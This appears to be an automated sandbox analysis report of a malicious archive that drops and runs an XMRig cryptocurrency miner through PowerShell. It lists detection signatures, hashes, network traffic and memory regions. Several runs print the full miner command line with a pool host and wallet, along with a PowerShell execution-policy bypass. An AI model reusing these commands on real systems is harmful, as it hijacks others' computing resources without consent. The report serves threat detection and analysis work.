Analysis Overview
SHA256
4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Threat Level: Known bad
The file main3.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-28 01:50
Signatures
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:11
Platform
win11-20240508-en
Max time kernel
1759s
Max time network
1771s
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/4852-0-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yoi34s1j.igp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:15
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1802s
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4252 wrote to memory of 3968 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4252 wrote to memory of 3968 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.24.18.2.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0dllvs5e.sl2.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:17
Platform
win10-20240404-en
Max time kernel
1791s
Max time network
1793s
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2916 wrote to memory of 2848 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2916 wrote to memory of 2848 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.211.222.173.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mtddsseb.dc4.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:05
Platform
win11-20240508-en
Max time kernel
1709s
Max time network
1719s
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/5064-0-0x00007FFA49493000-0x00007FFA49495000-memory.dmp
memory/5064-9-0x00007FFA49490000-0x00007FFA49F52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_id1u1z21.k41.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:07
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1801s
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3376 wrote to memory of 4380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3376 wrote to memory of 4380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hpiy4bqc.les.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4380-122-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-123-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-124-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-125-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-126-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-127-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-128-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-129-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-130-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-131-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-132-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-133-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-134-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-135-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-136-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-137-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-138-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-139-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-140-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-141-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-142-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-143-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-144-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-145-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-146-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-147-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-148-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-149-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-150-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-151-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-152-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-153-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-154-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-155-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-156-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-157-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:08
Platform
win10-20240404-en
Max time kernel
1790s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2836 wrote to memory of 2352 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2836 wrote to memory of 2352 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/2836-3-0x00007FFB570B3000-0x00007FFB570B4000-memory.dmp
memory/2836-5-0x0000018FEC690000-0x0000018FEC6B2000-memory.dmp
memory/2836-8-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp
memory/2836-9-0x0000018FEC890000-0x0000018FEC906000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rp2ujln0.zhu.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2836-10-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp
memory/2836-25-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp
memory/2836-48-0x0000018FEC840000-0x0000018FEC852000-memory.dmp
memory/2836-61-0x0000018FEC820000-0x0000018FEC82A000-memory.dmp
memory/2836-83-0x00007FFB570B3000-0x00007FFB570B4000-memory.dmp
memory/2836-89-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2352-92-0x000001F42DBB0000-0x000001F42DBD0000-memory.dmp
memory/2352-93-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2836-94-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp
memory/2352-95-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-96-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-97-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-98-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-99-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-100-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-101-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-102-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-103-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-104-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
